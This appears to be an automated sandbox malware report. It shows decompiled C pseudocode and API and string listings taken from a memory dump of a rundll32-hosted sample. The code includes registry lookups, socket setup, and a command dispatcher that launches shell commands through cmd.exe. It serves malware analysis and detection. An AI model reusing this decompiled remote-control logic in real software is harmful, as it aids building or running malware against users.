                                                            0x0464b05b
                                                            0x0464b05e
                                                            0x0464b064
                                                            0x0464b066
                                                            0x00000000
                                                            0x0464b068
                                                            0x0464b068
                                                            0x0464b070
                                                            0x0464b074
                                                            0x0464b075
                                                            0x0464b078
                                                            0x0464b07a
                                                            0x0464b084
                                                            0x0464b087
                                                            0x0464b087
                                                            0x0464b091
                                                            0x0464b091
                                                            0x0464b0a5
                                                            0x0464b0a5
                                                            0x0464b066

                                                            APIs
                                                              • Part of subcall function 04646050: RegOpenKeyExW.KERNEL32(80000002,004F0053,00000000,00020119,?,00000000,00000000,0000038F), ref: 046461F1
                                                              • Part of subcall function 04646050: RegQueryValueExW.KERNEL32(?,0061004D,00000000,?,?,0000004A), ref: 0464621F
                                                              • Part of subcall function 04646050: RegCloseKey.ADVAPI32(?), ref: 04646235
                                                            • wsprintfW.USER32 ref: 0464AFEC
                                                            • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00020119,?), ref: 0464B023
                                                            • RegQueryValueExW.ADVAPI32(?,0467E124,00000000,?,?,?), ref: 0464B048
                                                            • RegCloseKey.ADVAPI32(?), ref: 0464B05E
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CloseOpenQueryValue$wsprintf
                                                            • String ID: Global$SOFTWARE\Classes\CLSID\%s
                                                            • API String ID: 3615287298-1865207932
                                                            • Opcode ID: e338163b0c84330de068907c6a4f2f41b562dc7edbf0b064ab392dfa655c10f1
                                                            • Instruction ID: eef0195022fae033b8c18e1ebd746613a0687276c7da4c8e9282de9bc11442ba
                                                            • Opcode Fuzzy Hash: e338163b0c84330de068907c6a4f2f41b562dc7edbf0b064ab392dfa655c10f1
                                                            • Instruction Fuzzy Hash: 9331D8316042589BDB20DF74DC88EEEBBBDEF89704F5001EDD5099A102FA32AA44CB50
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 69%
                                                            			E04641A30(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, intOrPtr _a4) {
                                                            				signed int _v12;
                                                            				void* _v84;
                                                            				char _v88;
                                                            				intOrPtr _v92;
                                                            				char _v96;
                                                            				signed int _t29;
                                                            				intOrPtr _t31;
                                                            				void* _t32;
                                                            				struct HICON__* _t34;
                                                            				intOrPtr _t36;
                                                            				intOrPtr _t39;
                                                            				intOrPtr* _t45;
                                                            				struct HICON__** _t51;
                                                            				signed int _t53;
                                                            				signed int _t55;
                                                            
                                                            				_t29 =  *0x4684008; // 0xd355be4e
                                                            				_v12 = _t29 ^ _t55;
                                                            				_t31 = _a4;
                                                            				_t45 = __ecx;
                                                            				 *__ecx = 0x467e8b0;
                                                            				 *((intOrPtr*)(__ecx + 4)) = _t31;
                                                            				 *((intOrPtr*)(_t31 + 0x38)) = __ecx;
                                                            				_t32 = CreateEventW(0, 1, 0, 0);
                                                            				asm("movaps xmm0, [0x467f950]");
                                                            				_t51 = _t45 + 0x70;
                                                            				asm("movups [ebp-0x4c], xmm0");
                                                            				_t53 = 0;
                                                            				 *(_t45 + 8) = _t32;
                                                            				asm("movaps xmm0, [0x467f940]");
                                                            				asm("movups [ebp-0x3c], xmm0");
                                                            				 *_t45 = 0x467eca4;
                                                            				asm("movaps xmm0, [0x467f930]");
                                                            				asm("movups [ebp-0x2c], xmm0");
                                                            				 *((intOrPtr*)(_t45 + 0x2c)) = 0x467ec9c;
                                                            				asm("movaps xmm0, [0x467f920]");
                                                            				asm("movups [ebp-0x1c], xmm0");
                                                            				do {
                                                            					 *(_t51 - 0x40) =  *(_t55 + _t53 * 4 - 0x4c);
                                                            					_t34 = LoadCursorW(0,  *(_t55 + _t53 * 4 - 0x4c));
                                                            					_t53 = _t53 + 1;
                                                            					 *_t51 = _t34;
                                                            					_t51 =  &(_t51[1]);
                                                            					_t58 = _t53 - 0x10;
                                                            				} while (_t53 < 0x10);
                                                            				 *((char*)(_t45 + 0x18)) = 2;
                                                            				 *((intOrPtr*)(_t45 + 0x20)) = 0x20;
                                                            				_t36 = L046423F0(_t45, L04655B14(_t53, _t58, 0x108), _t51, _t53, 0x20, 0);
                                                            				asm("movsd xmm0, [0x467f918]");
                                                            				 *((intOrPtr*)(_t45 + 0xb0)) = _t36;
                                                            				 *((char*)(_t45 + 0xc)) = 1;
                                                            				 *(_t45 + 0x14) = 0;
                                                            				 *(_t45 + 0x10) = 0;
                                                            				 *(_t45 + 0x1c) = 0;
                                                            				asm("movsd [ebx+0xb8], xmm0");
                                                            				_v96 = E04642050;
                                                            				_v92 = _t45;
                                                            				_v88 = 1;
                                                            				_v84 = CreateEventW(0, 0, 0, 0);
                                                            				_t39 = E0465F897(_t35, 0, 0, E04645400,  &_v96, 0, 0);
                                                            				WaitForSingleObject(_v84, 0xffffffff);
                                                            				CloseHandle(_v84);
                                                            				 *((intOrPtr*)(_t45 + 0x24)) = _t39;
                                                            				return E04655AFE(_v12 ^ _t55);
                                                            			}


















                                                            0x04641a36
                                                            0x04641a3d
                                                            0x04641a40
                                                            0x04641a48
                                                            0x04641a50
                                                            0x04641a56
                                                            0x04641a59
                                                            0x04641a5c
                                                            0x04641a62
                                                            0x04641a69
                                                            0x04641a6c
                                                            0x04641a70
                                                            0x04641a72
                                                            0x04641a75
                                                            0x04641a7c
                                                            0x04641a80
                                                            0x04641a86
                                                            0x04641a8d
                                                            0x04641a91
                                                            0x04641a98
                                                            0x04641a9f
                                                            0x04641aa3
                                                            0x04641aaa
                                                            0x04641aad
                                                            0x04641ab3
                                                            0x04641ab4
                                                            0x04641ab6
                                                            0x04641ab9
                                                            0x04641ab9
                                                            0x04641ac3
                                                            0x04641ac7
                                                            0x04641ad9
                                                            0x04641ade
                                                            0x04641aee
                                                            0x04641af4
                                                            0x04641af8
                                                            0x04641aff
                                                            0x04641b06
                                                            0x04641b0d
                                                            0x04641b15
                                                            0x04641b1c
                                                            0x04641b1f
                                                            0x04641b2d
                                                            0x04641b3d
                                                            0x04641b4c
                                                            0x04641b55
                                                            0x04641b61
                                                            0x04641b70

                                                            APIs
                                                            • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 04641A5C
                                                            • LoadCursorW.USER32(00000000,?), ref: 04641AAD
                                                            • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,00000020,00000000,00000108), ref: 04641B23
                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 04641B4C
                                                            • CloseHandle.KERNEL32(?), ref: 04641B55
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CreateEvent$CloseCursorHandleLoadObjectSingleWait
                                                            • String ID:
                                                            • API String ID: 3220371329-3916222277
                                                            • Opcode ID: 7727b41ea09234744f8884c751fd12441e028f7efc15b7bf5360683bf6c70e10
                                                            • Instruction ID: 947de241d74baaa4896a2632a7ca707ede76a944ff3d884034c3bd6c0a7eea6c
                                                            • Opcode Fuzzy Hash: 7727b41ea09234744f8884c751fd12441e028f7efc15b7bf5360683bf6c70e10
                                                            • Instruction Fuzzy Hash: 9541C771E40344EBEB058FA8DC89B9ABBB0FF14704F105259ED046F196FBB5A884CB85
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 55%
                                                            			E04641C30(intOrPtr __ecx, intOrPtr _a4) {
                                                            				void* _v20;
                                                            				char _v24;
                                                            				intOrPtr _v28;
                                                            				char _v32;
                                                            				void* __ebx;
                                                            				void* __edi;
                                                            				void* __esi;
                                                            				void* _t23;
                                                            				void* _t36;
                                                            				int _t38;
                                                            				intOrPtr _t42;
                                                            				intOrPtr* _t45;
                                                            				intOrPtr _t49;
                                                            				void* _t51;
                                                            
                                                            				_push(_t51);
                                                            				_t49 = __ecx;
                                                            				 *((char*)(__ecx + 0xc)) = 0;
                                                            				WaitForSingleObject( *(__ecx + 0x24), 0xffffffff);
                                                            				CloseHandle( *(_t49 + 0x24));
                                                            				_t45 =  *((intOrPtr*)(_t49 + 0xb0));
                                                            				_t59 = _t45;
                                                            				if(_t45 != 0) {
                                                            					 *((intOrPtr*)( *_t45))(1);
                                                            				}
                                                            				_t42 = _a4;
                                                            				_t23 = L04655B14(_t51, _t59, 0x108);
                                                            				if(_t42 != 3) {
                                                            					__eflags = _t42 - 7;
                                                            					if(_t42 != 7) {
                                                            						_push(0);
                                                            						_push(_t42);
                                                            					} else {
                                                            						_push(1);
                                                            						_push(8);
                                                            					}
                                                            				} else {
                                                            					_push(1);
                                                            					_push(4);
                                                            				}
                                                            				 *((intOrPtr*)(_t49 + 0xb0)) = L046423F0(_t42, _t23, _t49, _t51);
                                                            				InterlockedExchange( *((intOrPtr*)(_t49 + 0xb0)) + 4,  *(_t49 + 0x18) & 0x000000ff);
                                                            				_t30 =  ==  ? 0xcc0020 : 0x40cc0020;
                                                            				InterlockedExchange( *((intOrPtr*)(_t49 + 0xb0)) + 0x10,  ==  ? 0xcc0020 : 0x40cc0020);
                                                            				 *((intOrPtr*)(_t49 + 0x20)) = _t42;
                                                            				 *((char*)(_t49 + 0xc)) = 1;
                                                            				_v32 = E04642050;
                                                            				_v28 = _t49;
                                                            				_v24 = 1;
                                                            				_v20 = CreateEventW(0, 0, 0, 0);
                                                            				_t36 = E0465F897(0xcc0020, 0, 0, E04645400,  &_v32, 0, 0);
                                                            				WaitForSingleObject(_v20, 0xffffffff);
                                                            				_t38 = CloseHandle(_v20);
                                                            				 *(_t49 + 0x24) = _t36;
                                                            				return _t38;
                                                            			}

















                                                            0x04641c3a
                                                            0x04641c3c
                                                            0x04641c43
                                                            0x04641c47
                                                            0x04641c50
                                                            0x04641c56
                                                            0x04641c5c
                                                            0x04641c5e
                                                            0x04641c64
                                                            0x04641c64
                                                            0x04641c66
                                                            0x04641c6e
                                                            0x04641c76
                                                            0x04641c7e
                                                            0x04641c81
                                                            0x04641c89
                                                            0x04641c8b
                                                            0x04641c83
                                                            0x04641c83
                                                            0x04641c85
                                                            0x04641c85
                                                            0x04641c78
                                                            0x04641c78
                                                            0x04641c7a
                                                            0x04641c7a
                                                            0x04641c99
                                                            0x04641cae
                                                            0x04641cbe
                                                            0x04641ccc
                                                            0x04641cd6
                                                            0x04641cd9
                                                            0x04641cdd
                                                            0x04641ce5
                                                            0x04641ce9
                                                            0x04641cf8
                                                            0x04641d0a
                                                            0x04641d1a
                                                            0x04641d24
                                                            0x04641d2a
                                                            0x04641d33

                                                            APIs
                                                            • WaitForSingleObject.KERNEL32(000000FF,000000FF), ref: 04641C47
                                                            • CloseHandle.KERNEL32(?), ref: 04641C50
                                                            • InterlockedExchange.KERNEL32(?,?), ref: 04641CAE
                                                            • InterlockedExchange.KERNEL32(?,40CC0020), ref: 04641CCC
                                                            • CreateEventW.KERNEL32 ref: 04641CEE
                                                            • WaitForSingleObject.KERNEL32(?,000000FF,00000000,00000000,00000000), ref: 04641D1A
                                                            • CloseHandle.KERNEL32(?), ref: 04641D24
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CloseExchangeHandleInterlockedObjectSingleWait$CreateEvent
                                                            • String ID:
                                                            • API String ID: 939225815-0
                                                            • Opcode ID: 6595f0d4fe0916082f8446d6d8956eefb563564faf62022ced90fa98f438b550
                                                            • Instruction ID: 6572a7197988c86ccc6b8dc2fd16d2b048c5a4766160c77c0bebdc3dc5866781
                                                            • Opcode Fuzzy Hash: 6595f0d4fe0916082f8446d6d8956eefb563564faf62022ced90fa98f438b550
                                                            • Instruction Fuzzy Hash: 7731F2B1344301BFEB049B69CC49B5ABBE4FF49724F100219F6599B2C1EBB5B8508B96
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 52%
                                                            			E04636C00(void* __ebx, void* __ecx, void* __edi, void* __esi, signed char _a4) {
                                                            				signed int _v8;
                                                            				signed int _v12;
                                                            				short _v532;
                                                            				char _v548;
                                                            				signed int _t15;
                                                            				signed int _t17;
                                                            				void* _t26;
                                                            				void* _t27;
                                                            				void* _t33;
                                                            				signed int _t35;
                                                            				signed int _t37;
                                                            
                                                            				_t27 = __ecx;
                                                            				_t26 = __ebx;
                                                            				_t37 = (_t35 & 0xfffffff8) - 0x224;
                                                            				_t15 =  *0x4684008; // 0xd355be4e
                                                            				_v8 = _t15 ^ _t37;
                                                            				_t17 = _a4 & 0x000000ff;
                                                            				asm("xorps xmm0, xmm0");
                                                            				_t33 = __ecx;
                                                            				asm("movups [esp+0x8], xmm0");
                                                            				if(_t17 > 7) {
                                                            					L10:
                                                            					return E04655AFE(_v8 ^ _t37);
                                                            				} else {
                                                            					switch( *((intOrPtr*)(_t17 * 4 +  &M04636CF4))) {
                                                            						case 0:
                                                            							GetWindowsDirectoryW( &_v532, 0x104);
                                                            							lstrcatW( &_v532, L"\\explorer.exe");
                                                            							goto L9;
                                                            						case 1:
                                                            							_push(L"cmd.exe /c rundll32.exe shell32.dll,#61");
                                                            							goto L8;
                                                            						case 2:
                                                            							__eax = E04636880(__ebx, __ecx, __edi, __esi, __eflags, __ecx);
                                                            							_pop(__esi);
                                                            							__ecx = _v12;
                                                            							__ecx = _v12 ^ __esp;
                                                            							__eflags = __ecx;
                                                            							return E04655AFE(__ecx);
                                                            							goto L11;
                                                            						case 3:
                                                            							__eax = E04636960(__ebx, __ecx, __edi, __esi, __eflags, __ecx);
                                                            							_pop(__esi);
                                                            							__ecx = _v12;
                                                            							__ecx = _v12 ^ __esp;
                                                            							__eflags = __ecx;
                                                            							return E04655AFE(__ecx);
                                                            							goto L11;
                                                            						case 4:
                                                            							__eax = E04636A40(__ebx, __ecx, __edi, __esi, __eflags, __ecx);
                                                            							_pop(__esi);
                                                            							__ecx = _v12;
                                                            							__ecx = _v12 ^ __esp;
                                                            							__eflags = __ecx;
                                                            							return E04655AFE(__ecx);
                                                            							goto L11;
                                                            						case 5:
                                                            							goto L10;
                                                            						case 6:
                                                            							_push(L"cmd.exe /c start iexplore.exe");
                                                            							L8:
                                                            							 &_v532 = lstrcpyW( &_v532, ??);
                                                            							L9:
                                                            							_push( &_v548);
                                                            							_push( &_v532);
                                                            							_push(_t27);
                                                            							E046472E0(_t26,  *((intOrPtr*)(_t33 + 0x70)), _t39);
                                                            							_t37 = _t37 - 8 + 0x14;
                                                            							goto L10;
                                                            					}
                                                            				}
                                                            				L11:
                                                            			}














                                                            0x04636c00
                                                            0x04636c00
                                                            0x04636c06
                                                            0x04636c0c
                                                            0x04636c13
                                                            0x04636c1a
                                                            0x04636c1e
                                                            0x04636c22
                                                            0x04636c24
                                                            0x04636c2c
                                                            0x04636cdc
                                                            0x04636cee
                                                            0x04636c32
                                                            0x04636c32
                                                            0x00000000
                                                            0x04636c43
                                                            0x04636c53
                                                            0x00000000
                                                            0x00000000
                                                            0x04636c5b
                                                            0x00000000
                                                            0x00000000
                                                            0x04636c63
                                                            0x04636c68
                                                            0x04636c69
                                                            0x04636c70
                                                            0x04636c70
                                                            0x04636c7a
                                                            0x00000000
                                                            0x00000000
                                                            0x04636c7e
                                                            0x04636c83
                                                            0x04636c84
                                                            0x04636c8b
                                                            0x04636c8b
                                                            0x04636c95
                                                            0x00000000
                                                            0x00000000
                                                            0x04636c99
                                                            0x04636c9e
                                                            0x04636c9f
                                                            0x04636ca6
                                                            0x04636ca6
                                                            0x04636cb0
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x04636cb3
                                                            0x04636cb8
                                                            0x04636cbd
                                                            0x04636cc3
                                                            0x04636cca
                                                            0x04636cd2
                                                            0x04636cd3
                                                            0x04636cd4
                                                            0x04636cd9
                                                            0x00000000
                                                            0x00000000
                                                            0x04636c32
                                                            0x00000000

                                                            APIs
                                                            • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 04636C43
                                                            • lstrcatW.KERNEL32(?,\explorer.exe), ref: 04636C53
                                                            • lstrcpyW.KERNEL32(?,cmd.exe /c rundll32.exe shell32.dll,#61), ref: 04636CBD
                                                            Strings
                                                            • \explorer.exe, xrefs: 04636C49
                                                            • cmd.exe /c start iexplore.exe, xrefs: 04636CB3
                                                            • cmd.exe /c rundll32.exe shell32.dll,#61, xrefs: 04636C5B
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: DirectoryWindowslstrcatlstrcpy
                                                            • String ID: \explorer.exe$cmd.exe /c rundll32.exe shell32.dll,#61$cmd.exe /c start iexplore.exe
                                                            • API String ID: 4189314281-3733130215
                                                            • Opcode ID: 038586f3b069b1dcfb2065dae64fedccd6c56502bfb1b1b055a7dac4df32f47c
                                                            • Instruction ID: 1b40bb89a7d464920cc7f16a17aa48e19041432eba85ae2a883793ec433bfcd1
                                                            • Opcode Fuzzy Hash: 038586f3b069b1dcfb2065dae64fedccd6c56502bfb1b1b055a7dac4df32f47c
                                                            • Instruction Fuzzy Hash: 1421D5B2514244BBC234FB74E88D8ABB3D8EF58315F004A1EF94686191FA75B550C7DA
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 90%
                                                            			E04652220(void* __ebx, intOrPtr* __ecx, intOrPtr _a4, intOrPtr _a8) {
                                                            				void* __edi;
                                                            				void* __esi;
                                                            				void* _t23;
                                                            				long _t24;
                                                            				void* _t27;
                                                            				long _t32;
                                                            				intOrPtr* _t41;
                                                            				void* _t42;
                                                            				void* _t43;
                                                            
                                                            				_t41 = __ecx;
                                                            				if( *((intOrPtr*)( *__ecx + 0x118))() == 0) {
                                                            					L10:
                                                            					return 0;
                                                            				} else {
                                                            					E0464EC90(__ecx + 0x174);
                                                            					if( *(__ecx + 0x54) != 3) {
                                                            						 *((intOrPtr*)(__ecx + 0x58)) = 1;
                                                            						SetLastError(0x139f);
                                                            						 *(_t41 + 0x174) = 0;
                                                            						goto L10;
                                                            					} else {
                                                            						 *(__ecx + 0x54) = 0;
                                                            						 *(__ecx + 0x174) = 0;
                                                            						 *((intOrPtr*)( *__ecx + 0x11c))();
                                                            						_t23 = L046523F0(__ebx, __ecx, __ecx, _t42, _a4);
                                                            						_t43 = GetLastError;
                                                            						if(_t23 == 0) {
                                                            							L8:
                                                            							_t24 = GetLastError();
                                                            							 *((intOrPtr*)( *_t41))();
                                                            							SetLastError(_t24);
                                                            							return 0;
                                                            						} else {
                                                            							_t27 = CreateIoCompletionPort(0xffffffff, 0, 0, 0);
                                                            							 *(_t41 + 0x50) = _t27;
                                                            							if(_t27 == 0) {
                                                            								_t32 = GetLastError();
                                                            								 *((intOrPtr*)(_t41 + 0x58)) = 7;
                                                            								SetLastError(_t32);
                                                            							}
                                                            							if( *(_t41 + 0x50) == 0 || E04652510(_t41, _t41, _t43) == 0) {
                                                            								goto L8;
                                                            							} else {
                                                            								 *((intOrPtr*)(_t41 + 0x4c)) = _a8;
                                                            								 *((intOrPtr*)(_t41 + 0x54)) = 1;
                                                            								ResetEvent( *(_t41 + 0x3c));
                                                            								return 1;
                                                            							}
                                                            						}
                                                            					}
                                                            				}
                                                            			}












                                                            0x04652225
                                                            0x04652231
                                                            0x04652308
                                                            0x0465230c
                                                            0x04652237
                                                            0x0465223d
                                                            0x04652246
                                                            0x046522f0
                                                            0x046522f7
                                                            0x046522fd
                                                            0x00000000
                                                            0x0465224c
                                                            0x0465224c
                                                            0x04652255
                                                            0x04652261
                                                            0x0465226c
                                                            0x04652271
                                                            0x04652279
                                                            0x046522d2
                                                            0x046522d2
                                                            0x046522da
                                                            0x046522dd
                                                            0x046522e8
                                                            0x0465227b
                                                            0x04652283
                                                            0x04652289
                                                            0x0465228e
                                                            0x04652290
                                                            0x04652293
                                                            0x0465229a
                                                            0x0465229a
                                                            0x046522a4
                                                            0x00000000
                                                            0x046522b1
                                                            0x046522b7
                                                            0x046522ba
                                                            0x046522c1
                                                            0x046522cf
                                                            0x046522cf
                                                            0x046522a4
                                                            0x04652279
                                                            0x04652246

                                                            APIs
                                                              • Part of subcall function 0464EC90: InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 0464ECA5
                                                              • Part of subcall function 0464EC90: SwitchToThread.KERNEL32(?,?,00000000,0464E712,?,00000000,04638425,74D0F5E0,00000004,80004005,80004005,80004005,80004005,80004005,?,046387F8), ref: 0464ECBD
                                                            • SetLastError.KERNEL32(0000139F), ref: 046522F7
                                                              • Part of subcall function 046523F0: socket.WS2_32(?,00000001,00000006), ref: 04652459
                                                              • Part of subcall function 046523F0: bind.WS2_32(00000000,00000002,0000001C), ref: 0465247E
                                                              • Part of subcall function 046523F0: closesocket.WS2_32(00000000), ref: 046524B4
                                                            • CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000000,00000000,?), ref: 04652283
                                                            • GetLastError.KERNEL32 ref: 04652290
                                                            • SetLastError.KERNEL32(00000000), ref: 0465229A
                                                            • ResetEvent.KERNEL32(?), ref: 046522C1
                                                            • GetLastError.KERNEL32(?), ref: 046522D2
                                                            • SetLastError.KERNEL32(00000000), ref: 046522DD
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ErrorLast$CompareCompletionCreateEventExchangeInterlockedPortResetSwitchThreadbindclosesocketsocket
                                                            • String ID:
                                                            • API String ID: 1231050892-0
                                                            • Opcode ID: 5586ba6d338ac3112a3e9bc8bdf08269ae539ae1c564c23f6c29ab9ec25237a9
                                                            • Instruction ID: f3fe8bedff61432ffa675e4be340e9bb91c4f4c2297e3d2b2ed560f002ffb0a9
                                                            • Opcode Fuzzy Hash: 5586ba6d338ac3112a3e9bc8bdf08269ae539ae1c564c23f6c29ab9ec25237a9
                                                            • Instruction Fuzzy Hash: 40218E35200602ABD714AFB9E8587D9FBA8FF54324F044166E909C6690EBB5B864CF90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 90%
                                                            			E04646B70(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                            				signed int _v8;
                                                            				char _v88;
                                                            				short _v608;
                                                            				void* _v612;
                                                            				char _v616;
                                                            				int _v620;
                                                            				int _v624;
                                                            				signed int _t20;
                                                            				signed int _t52;
                                                            
                                                            				_t20 =  *0x4684008; // 0xd355be4e
                                                            				_v8 = _t20 ^ _t52;
                                                            				_v616 = 0;
                                                            				_v620 = 4;
                                                            				E04646050(__ebx, L"SEOID",  &_v88, __edi, __esi);
                                                            				wsprintfW( &_v608, L"SOFTWARE\\Classes\\CLSID\\%s",  &_v88);
                                                            				E0465DEA0(__edi,  &_v616, 0, _v620);
                                                            				_v612 = 0;
                                                            				if(RegOpenKeyExW(0x80000002,  &_v608, 0, 0x20119,  &_v612) != 0) {
                                                            					L3:
                                                            					return E04655AFE(_v8 ^ _t52);
                                                            				} else {
                                                            					RegQueryValueExW(_v612, "1", 0,  &_v624,  &_v616,  &_v620);
                                                            					_t51 =  ==  ? 1 : 0;
                                                            					RegCloseKey(_v612);
                                                            					_t58 =  ==  ? 1 : 0;
                                                            					if(( ==  ? 1 : 0) == 0) {
                                                            						goto L3;
                                                            					} else {
                                                            						return E04655AFE(_v8 ^ _t52);
                                                            					}
                                                            				}
                                                            			}












                                                            0x04646b79
                                                            0x04646b80
                                                            0x04646b87
                                                            0x04646b96
                                                            0x04646ba0
                                                            0x04646bb5
                                                            0x04646bcb
                                                            0x04646bd3
                                                            0x04646bfa
                                                            0x04646c52
                                                            0x04646c62
                                                            0x04646bfc
                                                            0x04646c1d
                                                            0x04646c30
                                                            0x04646c33
                                                            0x04646c39
                                                            0x04646c3b
                                                            0x00000000
                                                            0x04646c3d
                                                            0x04646c51
                                                            0x04646c51
                                                            0x04646c3b

                                                            APIs
                                                              • Part of subcall function 04646050: RegOpenKeyExW.KERNEL32(80000002,004F0053,00000000,00020119,?,00000000,00000000,0000038F), ref: 046461F1
                                                              • Part of subcall function 04646050: RegQueryValueExW.KERNEL32(?,0061004D,00000000,?,?,0000004A), ref: 0464621F
                                                              • Part of subcall function 04646050: RegCloseKey.ADVAPI32(?), ref: 04646235
                                                            • wsprintfW.USER32 ref: 04646BB5
                                                            • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00020119,?), ref: 04646BF2
                                                            • RegQueryValueExW.ADVAPI32(?,0467E09C,00000000,?,?,?), ref: 04646C1D
                                                            • RegCloseKey.ADVAPI32(?), ref: 04646C33
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CloseOpenQueryValue$wsprintf
                                                            • String ID: SEOID$SOFTWARE\Classes\CLSID\%s
                                                            • API String ID: 3615287298-3437544703
                                                            • Opcode ID: 2a08624b13842f946e630a6985c9b88d14a56c6875e0b6e7505d7351fe6d5b45
                                                            • Instruction ID: 390ad786691ce04731bc0658bb6d339145cd632f40d076fff8dcf5b0feb987d4
                                                            • Opcode Fuzzy Hash: 2a08624b13842f946e630a6985c9b88d14a56c6875e0b6e7505d7351fe6d5b45
                                                            • Instruction Fuzzy Hash: D521127290522CABDB20EFA0DD4CBEAB7BCEF44600F0001D9A90AA6115FA365E44CF90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 88%
                                                            			E04644790(WCHAR* __ecx, WCHAR* __edx, void* __esi) {
                                                            				signed int _v0;
                                                            				signed int _v8;
                                                            				struct _SYSTEMTIME _v24;
                                                            				struct _SYSTEMTIME _v40;
                                                            				struct _FILETIME _v48;
                                                            				struct _FILETIME _v56;
                                                            				struct _FILETIME _v64;
                                                            				signed int _t16;
                                                            				WCHAR* _t45;
                                                            				signed int _t48;
                                                            
                                                            				_t50 = (_t48 & 0xfffffff8) - 0x3c;
                                                            				_t16 =  *0x4684008; // 0xd355be4e
                                                            				_v8 = _t16 ^ (_t48 & 0xfffffff8) - 0x0000003c;
                                                            				_t45 = __edx;
                                                            				if(GetFileTime(CreateFileW(__ecx, 0, 1, 0, 3, 0x80, 0),  &_v64,  &_v48,  &_v56) != 0) {
                                                            					FileTimeToSystemTime( &_v64,  &_v24);
                                                            					SystemTimeToTzSpecificLocalTime(0,  &_v24,  &_v40);
                                                            					wsprintfW(_t45, L"%04d-%02d-%02d  %02d:%02d", _v40.wYear & 0x0000ffff, _v40.wMonth & 0x0000ffff, _v40.wDay & 0x0000ffff, _v40.wHour & 0x0000ffff, _v40.wMinute & 0x0000ffff);
                                                            					return E04655AFE(_v0 ^ _t50 + 0x0000001c);
                                                            				} else {
                                                            					return E04655AFE(_v8 ^ _t50);
                                                            				}
                                                            			}













                                                            0x04644796
                                                            0x04644799
                                                            0x046447a0
                                                            0x046447b5
                                                            0x046447d5
                                                            0x046447f1
                                                            0x04644803
                                                            0x0464482d
                                                            0x0464484a
                                                            0x046447d7
                                                            0x046447e6
                                                            0x046447e6

                                                            APIs
                                                            • CreateFileW.KERNEL32(-00000220,00000000,00000001,00000000,00000003,00000080,00000000,00000012), ref: 046447B7
                                                            • GetFileTime.KERNEL32(00000000,?,?,?), ref: 046447CD
                                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 046447F1
                                                            • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 04644803
                                                            • wsprintfW.USER32 ref: 0464482D
                                                            Strings
                                                            • %04d-%02d-%02d %02d:%02d, xrefs: 04644827
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Time$File$System$CreateLocalSpecificwsprintf
